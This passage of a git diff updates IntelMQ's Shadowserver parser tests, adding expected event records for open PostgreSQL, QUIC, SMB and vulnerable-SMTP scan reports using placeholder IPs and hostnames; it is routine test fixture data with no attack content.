+   'extra.cert_expired' : True,
+   'extra.cert_issue_date' : '2012-11-14 11:18:27',
+   'extra.cert_length' : 2048,
+   'extra.cert_serial_number' : 'B3F13DFBDBA2D8B2',
+   'extra.cert_valid' : False,
+   'extra.cipher_suite' : 'TLS_AES_256_GCM_SHA384',
+   'extra.client_ssl' : False,
+   'extra.issuer_common_name' : 'example.com',
+   'extra.key_algorithm' : 'rsaEncryption',
+   'extra.md5_fingerprint' : 'F1:8A:02:48:3C:6B:F4:00:CC:5C:D5:B0:71:E4:FA:00',
+   'extra.protocol_error_code' : '0A000',
+   'extra.protocol_error_file' : 'postmaster.c',
+   'extra.protocol_error_line' : '1798',
+   'extra.protocol_error_message' : 'unsupported frontend protocol 255.255: server supports 1.0 to 3.0',
+   'extra.protocol_error_routine' : 'ProcessStartupPacket',
+   'extra.protocol_error_severity' : 'FATAL',
+   'extra.sha1_fingerprint' : '03:39:9E:5D:77:19:38:C4:49:DE:C3:3D:9B:E6:13:ED:5A:F1:42:55',
+   'extra.sha256_fingerprint' : 'E1:D1:6E:87:49:B9:AC:74:B4:AC:9B:77:85:27:69:97:0D:16:B1:F6:63:F0:26:51:AA:89:42:39:66:BD:47:D0',
+   'extra.sha512_fingerprint' : '1C:E9:04:22:90:46:68:0B:8B:54:33:38:C6:20:5F:EE:A6:73:A6:B5:2C:7D:12:94:DE:F1:CC:11:2E:72:0B:97:C2:7D:19:BF:E0:6B:98:A9:21:D9:9D:5A:CB:38:0B:D8:7E:E2:8E:2B:EA:15:EC:60:11:1E:41:E3:FB:4C:20:9F',
+   'extra.source.sector' : 'Communications, Service Provider, and Hosting Service',
+   'extra.startup_error_code' : '28000',
+   'extra.startup_error_file' : 'postmaster.c',
+   'extra.startup_error_line' : 1893,
+   'extra.startup_error_message' : 'no PostgreSQL user name specified in startup packet',
+   'extra.startup_error_routine' : 'ProcessStartupPacket',
+   'extra.startup_error_severity' : 'FATAL',
+   'extra.subject_common_name' : 'example.com',
+   'extra.subject_country' : 'US',
+   'extra.supported_protocols' : '1.0-3.0',
+   'extra.tag' : 'postgres',
+   'feed.name' : 'Accessible-PostgreSQL',
+   'protocol.application' : 'postgres',
+   'protocol.transport' : 'tcp',
+   'raw' : utils.base64_encode('\n'.join([EXAMPLE_LINES[0], EXAMPLE_LINES[1]])),
+   'source.asn' : 64512,
+   'source.geolocation.cc' : 'ZZ',
+   'source.geolocation.city' : 'City',
+   'source.geolocation.region' : 'Region',
+   'source.ip' : '192.168.0.1',
+   'source.port' : 5432,
+   'source.reverse_dns' : 'node01.example.com',
+   'time.observation' : '2010-02-10T00:00:00+00:00',
+   'time.source' : '2010-02-10T00:00:00+00:00'
+},
+
+{
+   '__type' : 'Event',
+   'classification.identifier' : 'open-postgres',
+   'classification.taxonomy' : 'other',
+   'classification.type' : 'other',
+   'extra.cert_expiration_date' : '2021-11-12 11:18:27',
+   'extra.cert_expired' : True,
+   'extra.cert_issue_date' : '2012-11-14 11:18:27',
+   'extra.cert_length' : 2048,
+   'extra.cert_serial_number' : 'B3F13DFBDBA2D8B2',
+   'extra.cert_valid' : False,
+   'extra.cipher_suite' : 'TLS_AES_256_GCM_SHA384',
+   'extra.client_ssl' : False,
+   'extra.issuer_common_name' : 'example.com',
+   'extra.key_algorithm' : 'rsaEncryption',
+   'extra.md5_fingerprint' : 'F1:8A:02:48:3C:6B:F4:00:CC:5C:D5:B0:71:E4:FA:00',
+   'extra.protocol_error_code' : '0A000',
+   'extra.protocol_error_file' : 'postmaster.c',
+   'extra.protocol_error_line' : '1798',
+   'extra.protocol_error_message' : 'unsupported frontend protocol 255.255: server supports 1.0 to 3.0',
+   'extra.protocol_error_routine' : 'ProcessStartupPacket',
+   'extra.protocol_error_severity' : 'FATAL',
+   'extra.sha1_fingerprint' : '03:39:9E:5D:77:19:38:C4:49:DE:C3:3D:9B:E6:13:ED:5A:F1:42:55',
+   'extra.sha256_fingerprint' : 'E1:D1:6E:87:49:B9:AC:74:B4:AC:9B:77:85:27:69:97:0D:16:B1:F6:63:F0:26:51:AA:89:42:39:66:BD:47:D0',
+   'extra.sha512_fingerprint' : '1C:E9:04:22:90:46:68:0B:8B:54:33:38:C6:20:5F:EE:A6:73:A6:B5:2C:7D:12:94:DE:F1:CC:11:2E:72:0B:97:C2:7D:19:BF:E0:6B:98:A9:21:D9:9D:5A:CB:38:0B:D8:7E:E2:8E:2B:EA:15:EC:60:11:1E:41:E3:FB:4C:20:9F',
+   'extra.source.sector' : 'Communications, Service Provider, and Hosting Service',
+   'extra.startup_error_code' : '28000',
+   'extra.startup_error_file' : 'postmaster.c',
+   'extra.startup_error_line' : 1893,
+   'extra.startup_error_message' : 'no PostgreSQL user name specified in startup packet',
+   'extra.startup_error_routine' : 'ProcessStartupPacket',
+   'extra.startup_error_severity' : 'FATAL',
+   'extra.subject_common_name' : 'example.com',
+   'extra.subject_country' : 'US',
+   'extra.supported_protocols' : '1.0-3.0',
+   'extra.tag' : 'postgres',
+   'feed.name' : 'Accessible-PostgreSQL',
+   'protocol.application' : 'postgres',
+   'protocol.transport' : 'tcp',
+   'raw' : utils.base64_encode('\n'.join([EXAMPLE_LINES[0], EXAMPLE_LINES[2]])),
+   'source.asn' : 64512,
+   'source.geolocation.cc' : 'ZZ',
+   'source.geolocation.city' : 'City',
+   'source.geolocation.region' : 'Region',
+   'source.ip' : '192.168.0.2',
+   'source.port' : 5432,
+   'source.reverse_dns' : 'node02.example.com',
+   'time.observation' : '2010-02-10T00:00:00+00:00',
+   'time.source' : '2010-02-10T00:00:01+00:00'
+},
+
+{
+   '__type' : 'Event',
+   'classification.identifier' : 'open-postgres',
+   'classification.taxonomy' : 'other',
+   'classification.type' : 'other',
+   'extra.cert_expiration_date' : '2021-11-12 11:18:27',
+   'extra.cert_expired' : True,
+   'extra.cert_issue_date' : '2012-11-14 11:18:27',
+   'extra.cert_length' : 2048,
+   'extra.cert_serial_number' : 'B3F13DFBDBA2D8B2',
+   'extra.cert_valid' : False,
+   'extra.cipher_suite' : 'TLS_AES_256_GCM_SHA384',
+   'extra.client_ssl' : False,
+   'extra.issuer_common_name' : 'example.com',
+   'extra.key_algorithm' : 'rsaEncryption',
+   'extra.md5_fingerprint' : 'F1:8A:02:48:3C:6B:F4:00:CC:5C:D5:B0:71:E4:FA:00',
+   'extra.protocol_error_code' : '0A000',
+   'extra.protocol_error_file' : 'postmaster.c',
+   'extra.protocol_error_line' : '1798',
+   'extra.protocol_error_message' : 'unsupported frontend protocol 255.255: server supports 1.0 to 3.0',
+   'extra.protocol_error_routine' : 'ProcessStartupPacket',
+   'extra.protocol_error_severity' : 'FATAL',
+   'extra.sha1_fingerprint' : '03:39:9E:5D:77:19:38:C4:49:DE:C3:3D:9B:E6:13:ED:5A:F1:42:55',
+   'extra.sha256_fingerprint' : 'E1:D1:6E:87:49:B9:AC:74:B4:AC:9B:77:85:27:69:97:0D:16:B1:F6:63:F0:26:51:AA:89:42:39:66:BD:47:D0',
+   'extra.sha512_fingerprint' : '1C:E9:04:22:90:46:68:0B:8B:54:33:38:C6:20:5F:EE:A6:73:A6:B5:2C:7D:12:94:DE:F1:CC:11:2E:72:0B:97:C2:7D:19:BF:E0:6B:98:A9:21:D9:9D:5A:CB:38:0B:D8:7E:E2:8E:2B:EA:15:EC:60:11:1E:41:E3:FB:4C:20:9F',
+   'extra.source.sector' : 'Communications, Service Provider, and Hosting Service',
+   'extra.startup_error_code' : '28000',
+   'extra.startup_error_file' : 'postmaster.c',
+   'extra.startup_error_line' : 1893,
+   'extra.startup_error_message' : 'no PostgreSQL user name specified in startup packet',
+   'extra.startup_error_routine' : 'ProcessStartupPacket',
+   'extra.startup_error_severity' : 'FATAL',
+   'extra.subject_common_name' : 'example.com',
+   'extra.subject_country' : 'US',
+   'extra.supported_protocols' : '1.0-3.0',
+   'extra.tag' : 'postgres',
+   'feed.name' : 'Accessible-PostgreSQL',
+   'protocol.application' : 'postgres',
+   'protocol.transport' : 'tcp',
+   'raw' : utils.base64_encode('\n'.join([EXAMPLE_LINES[0], EXAMPLE_LINES[3]])),
+   'source.asn' : 64512,
+   'source.geolocation.cc' : 'ZZ',
+   'source.geolocation.city' : 'City',
+   'source.geolocation.region' : 'Region',
+   'source.ip' : '192.168.0.3',
+   'source.port' : 5432,
+   'source.reverse_dns' : 'node03.example.com',
+   'time.observation' : '2010-02-10T00:00:00+00:00',
+   'time.source' : '2010-02-10T00:00:02+00:00'
+}
+]
+
+
+class TestShadowserverParserBot(test.BotTestCase, unittest.TestCase):
+    """
+    A TestCase for a ShadowserverParserBot.
+    """
+
+    @classmethod
+    def set_bot(cls):
+        cls.bot_reference = ShadowserverParserBot
+        cls.default_input_message = EXAMPLE_REPORT
+
+    def test_event(self):
+        """ Test if correct Event has been produced. """
+        self.run_bot()
+        for i, EVENT in enumerate(EVENTS):
+            self.assertMessageEqual(i, EVENT)
+
+
+if __name__ == '__main__':  # pragma: no cover
+    unittest.main()
diff --git a/intelmq/tests/bots/parsers/shadowserver/test_scan_quic.py b/intelmq/tests/bots/parsers/shadowserver/test_scan_quic.py
new file mode 100644
index 000000000..23d11ce99
--- /dev/null
+++ b/intelmq/tests/bots/parsers/shadowserver/test_scan_quic.py
@@ -0,0 +1,118 @@
+# SPDX-FileCopyrightText: 2022 Shadowserver Foundation
+#
+# SPDX-License-Identifier: AGPL-3.0-or-later
+
+# -*- coding: utf-8 -*-
+
+import os
+import unittest
+
+import intelmq.lib.test as test
+import intelmq.lib.utils as utils
+from intelmq.bots.parsers.shadowserver.parser import ShadowserverParserBot
+
+with open(os.path.join(os.path.dirname(__file__),
+                       'testdata/scan_quic.csv')) as handle:
+    EXAMPLE_FILE = handle.read()
+EXAMPLE_LINES = EXAMPLE_FILE.splitlines()
+
+EXAMPLE_REPORT = {'feed.name': 'Accessible QUIC Report',
+                  "raw": utils.base64_encode(EXAMPLE_FILE),
+                  "__type": "Report",
+                  "time.observation": "2022-01-07T00:00:00+00:00",
+                  "extra.file_name": "2022-01-07-scan_quic-test.csv",
+                  }
+EVENTS = [
+{
+   '__type' : 'Event',
+   'classification.identifier' : 'open-quic',
+   'classification.taxonomy' : 'other',
+   'classification.type' : 'other',
+   'extra.source.naics' : 517311,
+   'extra.tag' : 'quic',
+   'extra.version_field_1' : 'Q050',
+   'extra.version_field_3' : 'Q046',
+   'extra.version_field_4' : 'Q043',
+   'feed.name' : 'Accessible QUIC Report',
+   'protocol.transport' : 'udp',
+   'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
+                                     EXAMPLE_LINES[1]])),
+   'source.asn' : 5607,
+   'source.geolocation.cc' : 'UK',
+   'source.geolocation.city' : 'LONDON',
+   'source.geolocation.region' : 'LONDON',
+   'source.ip' : '176.255.0.0',
+   'source.port' : 443,
+   'source.reverse_dns' : 'test1.example.com',
+   'time.observation' : '2022-01-07T00:00:00+00:00',
+   'time.source' : '2022-01-10T14:31:17+00:00'
+},
+{
+   '__type' : 'Event',
+   'classification.identifier' : 'open-quic',
+   'classification.taxonomy' : 'other',
+   'classification.type' : 'other',
+   'extra.source.naics' : 517311,
+   'extra.tag' : 'quic',
+   'extra.version_field_1' : 'Q050',
+   'extra.version_field_2' : 'Q046',
+   'extra.version_field_4' : 'Q043',
+   'feed.name' : 'Accessible QUIC Report',
+   'protocol.transport' : 'udp',
+   'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
+                                     EXAMPLE_LINES[2]])),
+   'source.asn' : 6327,
+   'source.geolocation.cc' : 'CA',
+   'source.geolocation.city' : 'MEACHAM',
+   'source.geolocation.region' : 'SASKATCHEWAN',
+   'source.ip' : '24.244.0.0',
+   'source.port' : 443,
+   'time.observation' : '2022-01-07T00:00:00+00:00',
+   'time.source' : '2022-01-10T14:31:17+00:00'
+},
+{
+   '__type' : 'Event',
+   'classification.identifier' : 'open-quic',
+   'classification.taxonomy' : 'other',
+   'classification.type' : 'other',
+   'extra.source.naics' : 517919,
+   'extra.tag' : 'quic',
+   'extra.version_field_2' : 'Q050',
+   'extra.version_field_3' : 'Q046',
+   'extra.version_field_4' : 'Q043',
+   'feed.name' : 'Accessible QUIC Report',
+   'protocol.transport' : 'udp',
+   'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
+                                     EXAMPLE_LINES[3]])),
+   'source.asn' : 20940,
+   'source.geolocation.cc' : 'JP',
+   'source.geolocation.city' : 'OSAKA',
+   'source.geolocation.region' : 'OSAKA',
+   'source.ip' : '23.60.0.0',
+   'source.port' : 443,
+   'source.reverse_dns' : 'test3.example.com',
+   'time.observation' : '2022-01-07T00:00:00+00:00',
+   'time.source' : '2022-01-10T14:31:17+00:00'
+}
+]
+
+
+class TestShadowserverParserBot(test.BotTestCase, unittest.TestCase):
+    """
+    A TestCase for a ShadowserverParserBot.
+    """
+
+    @classmethod
+    def set_bot(cls):
+        cls.bot_reference = ShadowserverParserBot
+        cls.default_input_message = EXAMPLE_REPORT
+
+    def test_event(self):
+        """ Test if correct Event has been produced. """
+        self.run_bot()
+        for i, EVENT in enumerate(EVENTS):
+            self.assertMessageEqual(i, EVENT)
+
+
+if __name__ == '__main__':  # pragma: no cover
+    unittest.main()
diff --git a/intelmq/tests/bots/parsers/shadowserver/test_scan_radmin.py b/intelmq/tests/bots/parsers/shadowserver/test_scan_radmin.py
index f793ebce5..7c052c451 100644
--- a/intelmq/tests/bots/parsers/shadowserver/test_scan_radmin.py
+++ b/intelmq/tests/bots/parsers/shadowserver/test_scan_radmin.py
@@ -50,7 +50,6 @@
         "classification.identifier": "accessible-radmin",
         "classification.taxonomy": "vulnerable",
         "classification.type": "vulnerable-system",
-        "extra.naics": 0,
         "extra.tag": "radmin",
         "extra.version": "Radmin v3.X Radmin Authentication",
         "feed.name": "Accessible Radmin",
@@ -156,7 +155,6 @@
         "classification.identifier": "accessible-radmin",
         "classification.taxonomy": "vulnerable",
         "classification.type": "vulnerable-system",
-        "extra.naics": 0,
         "extra.tag": "radmin",
         "extra.version": "Radmin v3.X Radmin Authentication",
         "feed.name": "Accessible Radmin",
diff --git a/intelmq/tests/bots/parsers/shadowserver/test_scan_msrdpeudp.py b/intelmq/tests/bots/parsers/shadowserver/test_scan_rdpeudp.py
similarity index 96%
rename from intelmq/tests/bots/parsers/shadowserver/test_scan_msrdpeudp.py
rename to intelmq/tests/bots/parsers/shadowserver/test_scan_rdpeudp.py
index 745ccbef4..9923ce9b9 100644
--- a/intelmq/tests/bots/parsers/shadowserver/test_scan_msrdpeudp.py
+++ b/intelmq/tests/bots/parsers/shadowserver/test_scan_rdpeudp.py
@@ -11,7 +11,7 @@
 import intelmq.lib.utils as utils
 from intelmq.bots.parsers.shadowserver.parser import ShadowserverParserBot
 
-with open(os.path.join(os.path.dirname(__file__), 'testdata/scan_msrdpeudp.csv')) as handle:
+with open(os.path.join(os.path.dirname(__file__), 'testdata/scan_rdpeudp.csv')) as handle:
     EXAMPLE_FILE = handle.read()
 EXAMPLE_LINES = EXAMPLE_FILE.splitlines()
 
@@ -19,7 +19,7 @@
                   "raw": utils.base64_encode(EXAMPLE_FILE),
                   "__type": "Report",
                   "time.observation": "2015-01-01T00:00:00+00:00",
-                  "extra.file_name": "2019-01-01-scan_msrdpeudp-test-geo.csv",
+                  "extra.file_name": "2019-01-01-scan_rdpeudp-test-geo.csv",
                   }
 
 EVENTS = [{'__type': 'Event',
diff --git a/intelmq/tests/bots/parsers/shadowserver/test_scan_smb.py b/intelmq/tests/bots/parsers/shadowserver/test_scan_smb.py
index 38a877cdd..921525122 100644
--- a/intelmq/tests/bots/parsers/shadowserver/test_scan_smb.py
+++ b/intelmq/tests/bots/parsers/shadowserver/test_scan_smb.py
@@ -22,44 +22,84 @@
                   "time.observation": "2015-01-01T00:00:00+00:00",
                   "extra.file_name": "2019-01-01-scan_smb-test-geo.csv",
                   }
-EVENTS = [{'__type': 'Event',
-           'feed.name': 'Accessible SMB',
-           'classification.taxonomy': 'vulnerable',
-           'classification.type': 'vulnerable-system',
-           'classification.identifier': 'open-smb',
-           'extra.smb_implant': False,
-           'protocol.application': 'smb',
-           'protocol.transport': 'tcp',
-           'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
-                                                 EXAMPLE_LINES[1]])),
-           'source.asn': 8559,
-           'source.geolocation.cc': 'AT',
-           'source.geolocation.city': 'EISENSTADT',
-           'source.geolocation.region': 'BURGENLAND',
-           'source.ip': '198.51.100.39',
-           'source.port': 445,
-           'time.observation': '2015-01-01T00:00:00+00:00',
-           'time.source': '2017-06-24T06:12:04+00:00'},
-          {'__type': 'Event',
-           'feed.name': 'Accessible SMB',
-           'classification.taxonomy': 'vulnerable',
-           'classification.type': 'vulnerable-system',
-           'extra.smb_implant': True,
-           'extra.arch': 'x86',
-           'extra.key': '0xcb68e558',
-           'classification.identifier': 'open-smb',
-           'protocol.application': 'smb',
-           'protocol.transport': 'tcp',
-           'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
-                                                 EXAMPLE_LINES[2]])),
-           'source.asn': 8447,
-           'source.geolocation.cc': 'AT',
-           'source.geolocation.city': 'GUNSKIRCHEN',
-           'source.geolocation.region': 'OBEROSTERREICH',
-           'source.ip': '198.51.100.94',
-           'source.port': 445,
-           'time.observation': '2015-01-01T00:00:00+00:00',
-           'time.source': '2017-06-24T06:22:59+00:00'},
+EVENTS = [
+{
+   '__type' : 'Event',
+   'classification.identifier' : 'open-smb',
+   'classification.taxonomy' : 'vulnerable',
+   'classification.type' : 'vulnerable-system',
+   'extra.smb_implant' : False,
+   'extra.smb_major_number' : '2',
+   'extra.smb_minor_number' : '1',
+   'extra.smb_version_string' : 'SMB 2.1',
+   'extra.smbv1_support' : 'N',
+   'extra.tag' : 'smb',
+   'feed.name' : 'Accessible SMB',
+   'protocol.application' : 'smb',
+   'protocol.transport' : 'tcp',
+   'raw' : utils.base64_encode('\n'.join([EXAMPLE_LINES[0], EXAMPLE_LINES[1]])),
+   'source.asn' : 64512,
+   'source.geolocation.cc' : 'ZZ',
+   'source.geolocation.city' : 'City',
+   'source.geolocation.region' : 'Region',
+   'source.ip' : '192.168.0.1',
+   'source.port' : 445,
+   'source.reverse_dns' : 'node01.example.com',
+   'time.observation' : '2015-01-01T00:00:00+00:00',
+   'time.source' : '2010-02-10T00:00:00+00:00'
+},
+
+{
+   '__type' : 'Event',
+   'classification.identifier' : 'open-smb',
+   'classification.taxonomy' : 'vulnerable',
+   'classification.type' : 'vulnerable-system',
+   'extra.smb_implant' : False,
+   'extra.smb_major_number' : '2',
+   'extra.smb_minor_number' : '1',
+   'extra.smb_version_string' : 'SMB 2.1',
+   'extra.smbv1_support' : 'N',
+   'extra.tag' : 'smb',
+   'feed.name' : 'Accessible SMB',
+   'protocol.application' : 'smb',
+   'protocol.transport' : 'tcp',
+   'raw' : utils.base64_encode('\n'.join([EXAMPLE_LINES[0], EXAMPLE_LINES[2]])),
+   'source.asn' : 64512,
+   'source.geolocation.cc' : 'ZZ',
+   'source.geolocation.city' : 'City',
+   'source.geolocation.region' : 'Region',
+   'source.ip' : '192.168.0.2',
+   'source.port' : 445,
+   'source.reverse_dns' : 'node02.example.com',
+   'time.observation' : '2015-01-01T00:00:00+00:00',
+   'time.source' : '2010-02-10T00:00:01+00:00'
+},
+
+{
+   '__type' : 'Event',
+   'classification.identifier' : 'open-smb',
+   'classification.taxonomy' : 'vulnerable',
+   'classification.type' : 'vulnerable-system',
+   'extra.smb_implant' : False,
+   'extra.smb_major_number' : '2',
+   'extra.smb_minor_number' : '1',
+   'extra.smb_version_string' : 'SMB 2.1',
+   'extra.smbv1_support' : 'N',
+   'extra.tag' : 'smb',
+   'feed.name' : 'Accessible SMB',
+   'protocol.application' : 'smb',
+   'protocol.transport' : 'tcp',
+   'raw' : utils.base64_encode('\n'.join([EXAMPLE_LINES[0], EXAMPLE_LINES[3]])),
+   'source.asn' : 64512,
+   'source.geolocation.cc' : 'ZZ',
+   'source.geolocation.city' : 'City',
+   'source.geolocation.region' : 'Region',
+   'source.ip' : '192.168.0.3',
+   'source.port' : 445,
+   'source.reverse_dns' : 'node03.example.com',
+   'time.observation' : '2015-01-01T00:00:00+00:00',
+   'time.source' : '2010-02-10T00:00:02+00:00'
+}
           ]
 
 
diff --git a/intelmq/tests/bots/parsers/shadowserver/test_scan_smb_json.py b/intelmq/tests/bots/parsers/shadowserver/test_scan_smb_json.py
index 087a5c599..cae83d273 100644
--- a/intelmq/tests/bots/parsers/shadowserver/test_scan_smb_json.py
+++ b/intelmq/tests/bots/parsers/shadowserver/test_scan_smb_json.py
@@ -22,42 +22,84 @@
                   "extra.file_name": "2019-01-01-scan_smb-test-geo.json",
                   }
 
-EVENTS = [{'__type': 'Event',
-           'feed.name': 'Accessible-SMB',
-           'classification.taxonomy': 'vulnerable',
-           'classification.type': 'vulnerable-system',
-           'classification.identifier': 'open-smb',
-           'extra.smb_implant': False,
-           'protocol.application': 'smb',
-           'protocol.transport': 'tcp',
-           'raw': utils.base64_encode(json.dumps([json.loads(EXAMPLE_FILE)[0]])),
-           'source.asn': 8559,
-           'source.geolocation.cc': 'AT',
-           'source.geolocation.city': 'EISENSTADT',
-           'source.geolocation.region': 'BURGENLAND',
-           'source.ip': '198.51.100.39',
-           'source.port': 445,
-           'time.observation': '2015-01-01T00:00:00+00:00',
-           'time.source': '2017-06-24T06:12:04+00:00'},
-           {'__type': 'Event',
-           'feed.name': 'Accessible-SMB',
-           'classification.taxonomy': 'vulnerable',
-           'classification.type': 'vulnerable-system',
-           'extra.smb_implant': True,
-           'extra.arch': 'x86',
-           'extra.key': '0xcb68e558',
-           'classification.identifier': 'open-smb',
-           'protocol.application': 'smb',
-           'protocol.transport': 'tcp',
-           'raw': utils.base64_encode(json.dumps([json.loads(EXAMPLE_FILE)[1]])),
-           'source.asn': 8447,
-           'source.geolocation.cc': 'AT',
-           'source.geolocation.city': 'GUNSKIRCHEN',
-           'source.geolocation.region': 'OBEROSTERREICH',
-           'source.ip': '198.51.100.94',
-           'source.port': 445,
-           'time.observation': '2015-01-01T00:00:00+00:00',
-           'time.source': '2017-06-24T06:22:59+00:00'},
+EVENTS = [
+{
+   '__type' : 'Event',
+   'classification.identifier' : 'open-smb',
+   'classification.taxonomy' : 'vulnerable',
+   'classification.type' : 'vulnerable-system',
+   'extra.smb_implant' : False,
+   'extra.smb_major_number' : '2',
+   'extra.smb_minor_number' : '1',
+   'extra.smb_version_string' : 'SMB 2.1',
+   'extra.smbv1_support' : 'N',
+   'extra.tag' : 'smb',
+   'feed.name' : 'Accessible-SMB',
+   'protocol.application' : 'smb',
+   'protocol.transport' : 'tcp',
+   'raw': utils.base64_encode(json.dumps([json.loads(EXAMPLE_FILE)[0]])),
+   'source.asn' : 64512,
+   'source.geolocation.cc' : 'ZZ',
+   'source.geolocation.city' : 'City',
+   'source.geolocation.region' : 'Region',
+   'source.ip' : '192.168.0.1',
+   'source.port' : 445,
+   'source.reverse_dns' : 'node01.example.com',
+   'time.observation' : '2015-01-01T00:00:00+00:00',
+   'time.source' : '2010-02-10T00:00:00+00:00'
+},
+
+{
+   '__type' : 'Event',
+   'classification.identifier' : 'open-smb',
+   'classification.taxonomy' : 'vulnerable',
+   'classification.type' : 'vulnerable-system',
+   'extra.smb_implant' : False,
+   'extra.smb_major_number' : '2',
+   'extra.smb_minor_number' : '1',
+   'extra.smb_version_string' : 'SMB 2.1',
+   'extra.smbv1_support' : 'N',
+   'extra.tag' : 'smb',
+   'feed.name' : 'Accessible-SMB',
+   'protocol.application' : 'smb',
+   'protocol.transport' : 'tcp',
+   'raw': utils.base64_encode(json.dumps([json.loads(EXAMPLE_FILE)[1]])),
+   'source.asn' : 64512,
+   'source.geolocation.cc' : 'ZZ',
+   'source.geolocation.city' : 'City',
+   'source.geolocation.region' : 'Region',
+   'source.ip' : '192.168.0.2',
+   'source.port' : 445,
+   'source.reverse_dns' : 'node02.example.com',
+   'time.observation' : '2015-01-01T00:00:00+00:00',
+   'time.source' : '2010-02-10T00:00:01+00:00'
+},
+
+{
+   '__type' : 'Event',
+   'classification.identifier' : 'open-smb',
+   'classification.taxonomy' : 'vulnerable',
+   'classification.type' : 'vulnerable-system',
+   'extra.smb_implant' : False,
+   'extra.smb_major_number' : '2',
+   'extra.smb_minor_number' : '1',
+   'extra.smb_version_string' : 'SMB 2.1',
+   'extra.smbv1_support' : 'N',
+   'extra.tag' : 'smb',
+   'feed.name' : 'Accessible-SMB',
+   'protocol.application' : 'smb',
+   'protocol.transport' : 'tcp',
+   'raw': utils.base64_encode(json.dumps([json.loads(EXAMPLE_FILE)[2]])),
+   'source.asn' : 64512,
+   'source.geolocation.cc' : 'ZZ',
+   'source.geolocation.city' : 'City',
+   'source.geolocation.region' : 'Region',
+   'source.ip' : '192.168.0.3',
+   'source.port' : 445,
+   'source.reverse_dns' : 'node03.example.com',
+   'time.observation' : '2015-01-01T00:00:00+00:00',
+   'time.source' : '2010-02-10T00:00:02+00:00'
+}
           ]
 
 class TestShadowserverJSONParserBot(test.BotTestCase, unittest.TestCase):
diff --git a/intelmq/tests/bots/parsers/shadowserver/test_scan_smtp_vulnerable.py b/intelmq/tests/bots/parsers/shadowserver/test_scan_smtp_vulnerable.py
index 671cd59ea..4428420cf 100644
--- a/intelmq/tests/bots/parsers/shadowserver/test_scan_smtp_vulnerable.py
+++ b/intelmq/tests/bots/parsers/shadowserver/test_scan_smtp_vulnerable.py
@@ -23,48 +23,52 @@
                   "extra.file_name": "2021-07-08-scan_smtp_vulnerable-test-test.csv",
                   }
 
-EVENTS = [{'__type': 'Event',
-           'feed.name': 'Vulnerable SMTP',
-           'classification.taxonomy': 'vulnerable',
-           'classification.type': 'vulnerable-system',
-           'extra.banner': '220 smtp-server.invalid ESMTP Exim 4.80 Wed, 11 Jun 2021 '
-                           '10:00:00 +0300|',
-           'extra.protocol': 'tcp',
-           'classification.identifier': 'vulnerable-smtp',
-           'extra.tag': 'smtp;21nails',
-           'protocol.application': 'smtp',
-           'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
-                                                 EXAMPLE_LINES[1]])),
-           'source.reverse_dns': 'smtp-server.invalid',
-           'source.asn': 12345,
-           'source.geolocation.cc': 'EE',
-           'source.geolocation.city': 'TALLINN',
-           'source.geolocation.region': 'HARJUMAA',
-           'source.ip': '1.2.3.4',
-           'source.port': 25,
-           'time.observation': '2021-07-08T00:00:00+00:00',
-           'time.source': '2021-07-08T11:58:42+00:00'},
-          {'__type': 'Event',
-           'feed.name': 'Vulnerable SMTP',
-           'classification.taxonomy': 'vulnerable',
-           'classification.type': 'vulnerable-system',
-           'extra.banner': '220 smtp-out.invalid, ESMTP EXIM 4.86_2|',
-           'extra.protocol': 'tcp',
-           'classification.identifier': 'vulnerable-smtp',
-           'extra.tag': 'smtp;21nails',
-           'protocol.application': 'smtp',
-           'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
-                                                 EXAMPLE_LINES[2]])),
-           'source.reverse_dns': 'smtp-out.invalid',
-           'source.asn': 23456,
-           'source.geolocation.cc': 'EE',
-           'source.geolocation.city': 'TALLINN',
-           'source.geolocation.region': 'HARJUMAA',
-           'source.ip': '5.6.7.8',
-           'source.port': 25,
-           'time.observation': '2021-07-08T00:00:00+00:00',
-           'time.source': '2021-07-08T11:58:44+00:00'},
-          ]
+EVENTS = [
+        {
+   '__type' : 'Event',
+   'classification.identifier' : 'vulnerable-smtp',
+   'classification.taxonomy' : 'vulnerable',
+   'classification.type' : 'vulnerable-system',
+   'extra.banner' : '220 smtp-server.invalid ESMTP Exim 4.80 Wed, 11 Jun 2021 10:00:00 +0300|',
+   'extra.tag' : 'smtp;21nails',
+   'feed.name' : 'Vulnerable SMTP',
+   'protocol.application' : 'smtp',
+   'protocol.transport' : 'tcp',
+   'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
+                                     EXAMPLE_LINES[1]])),
+   'source.asn' : 12345,
+   'source.geolocation.cc' : 'EE',
+   'source.geolocation.city' : 'TALLINN',
+   'source.geolocation.region' : 'HARJUMAA',
+   'source.ip' : '1.2.3.4',
+   'source.port' : 25,
+   'source.reverse_dns' : 'smtp-server.invalid',
+   'time.observation' : '2021-07-08T00:00:00+00:00',
+   'time.source' : '2021-07-08T11:58:42+00:00'
+},
+{
+   '__type' : 'Event',
+   'classification.identifier' : 'vulnerable-smtp',
+   'classification.taxonomy' : 'vulnerable',
+   'classification.type' : 'vulnerable-system',
+   'extra.banner' : '220 smtp-out.invalid, ESMTP EXIM 4.86_2|',
+   'extra.tag' : 'smtp;21nails',
+   'feed.name' : 'Vulnerable SMTP',
+   'protocol.application' : 'smtp',
+   'protocol.transport' : 'tcp',
+   'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
+                                     EXAMPLE_LINES[2]])),
+   'source.asn' : 23456,
+   'source.geolocation.cc' : 'EE',
+   'source.geolocation.city' : 'TALLINN',
+   'source.geolocation.region' : 'HARJUMAA',
+   'source.ip' : '5.6.7.8',
+   'source.port' : 25,
+   'source.reverse_dns' : 'smtp-out.invalid',
+   'time.observation' : '2021-07-08T00:00:00+00:00',
+   'time.source' : '2021-07-08T11:58:44+00:00'
+}
+]
 
 
 class TestShadowserverParserBot(test.BotTestCase, unittest.TestCase):
diff --git a/intelmq/tests/bots/parsers/shadowserver/test_scan_snmp.py b/intelmq/tests/bots/parsers/shadowserver/test_scan_snmp.py
index 4b2e3dc53..7017aaa5b 100644
--- a/intelmq/tests/bots/parsers/shadowserver/test_scan_snmp.py
+++ b/intelmq/tests/bots/parsers/shadowserver/test_scan_snmp.py
@@ -21,212 +21,86 @@
                   "time.observation": "2015-01-01T00:00:00+00:00",
